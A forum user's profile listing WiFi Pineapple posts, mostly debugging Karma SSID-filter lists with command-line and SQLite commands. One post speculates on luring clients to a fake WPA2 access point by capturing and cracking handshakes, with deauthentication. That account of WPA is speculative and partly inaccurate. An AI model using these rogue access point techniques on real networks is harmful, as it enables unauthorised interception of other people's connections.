-
Posts
8 -
Joined
-
Last visited
Posts posted by rpcodes
-
-
I ran a similar set of tests about a month ago, maybe more by now, Win7, Android, and Ubuntu Linux clients. On the Tetra, but same software (Karma, etc). I think that to accept a client that is looking for a WPA access point, pineapple would need some way to respond with the correct handshake (using tools like airng and the like maybe?)
In other words its not enough to reply "Yes I am the WPA AP you want", like it does with Open networks and Karma
Iirc WPA is like:Client sends some handshake infoAP replies with its handshake infoEverything matches then client connects; otherwise, no dice.I'm thinking, is it possible to set up pineapple something like this:1. listen for and collect the clients handshake / request to connect2. send to a server to crack / brute force / etc the password, again i think air-ng or something may have this capability?3. once cracked, send handshake reply to pineapple4. broadcast the handshake reply, so now client thinks pineapple is its desired WPA2 API have not investigated the sort of computational power it would take for a "simple" WPA2 password crack, this is just an idealized flow. Any WPA2 experts - Am I on the right track at least?I second your notion of trimming your pool size. I wonder, does pineapple interface allow us to filter out WPA protected ARPs somehow? I will have to look again for this, curious...
-
ssids seem to be kept in
/etc/pineapple/pineapple.db a SQLite database. This is what I see:
sqlite> select * from ssid_list;
id,ssid1,"XANADU-ZONE"2,""So I can clear by doingdelete from ssid_list;then replacing modified database file. That works fine if I want to start over.I did more digging, and Im not sure how it got into the state above anyway, where a newline seems to be appended. The issue started with the web console. But here is the table just using the web console again:sqlite> select * from ssid_list;id,ssid1,Coconuts2,"Added From Web Client"3,HOME-A9E8-5I will try and post more info when it happens again esp. if I figure out how to recreate. -
Additionally I tried investigating using hostapd karma commands. I think I am just making things worse though?
> karma_del_ssidInvalid 'delete Karma SSID' command - exactly one argument, SSID, is required.> kamra_del_ssid Test-SSID Number 1Unknown command 'kamra_del_ssid'> kamra_del_ssid "Test-SSID Number 1"Unknown command 'kamra_del_ssid'> -
1.0.2 Tetra firmware. Reboot, etc, problem persists. Closest I could find seems to be fixed: https://forums.hak5.org/index.php?/topic/37619-problems-using-filtering/
Applies to web console and command line. Command line dump:
root@Pineapple:/# pineapple karma list_ssidsXANADU-ZONEroot@Pineapple:/# pineapple karma del_ssid XANADU-ZONESucessfully removed SSID XANADU-ZONEroot@Pineapple:/# pineapple karma list_ssidsXANADU-ZONEI think the problem has to do with spaces, not sure how exactly Check this out:root@Pineapple:/# pineapple karma add_ssid TEST-SSID Number 1Sucessfully added SSID TEST-SSIDroot@Pineapple:/# pineapple karma list_ssidsXANADU-ZONETEST-SSIDroot@Pineapple:/# pineapple karma del_ssid TEST-SSID Number 1Sucessfully removed SSID TEST-SSIDroot@Pineapple:/# pineapple karma list_ssidsXANADU-ZONEIf I didn't know the "full" name of the SSID, I couldn't remove it. For now, where are these entries stored on the wifi pineapple so I can manually remove (all of) them? A button/command in karma to clear all filters would be great also!Also note there is a blank entry that cannot be removed either. Anyone know a quick way to clear this karma white/black list without firmware reset?
Karma Jasager wpa
in WiFi Pineapple NANO
Posted
Mr-Protocol thanks for the input. I think your steps are the same as mine just written in simpler language. And you also add the deauth step, yes, I agree.
I was looking for a no hands solution, so your step 3, can that be automated somehow do you know? Similar to how karma broadcasts beacons, I'd ultimately like to broadcast WPA APs the same way.
I also found on forums this which is basically step 1
https://forums.hak5.org/index.php?/topic/38180-howto-capture-wpa-handshake-wifi-pineapple-nano/
So for the WPA experts - what do we use to actually generate the AP side handshake? i.e. what are our cracking tools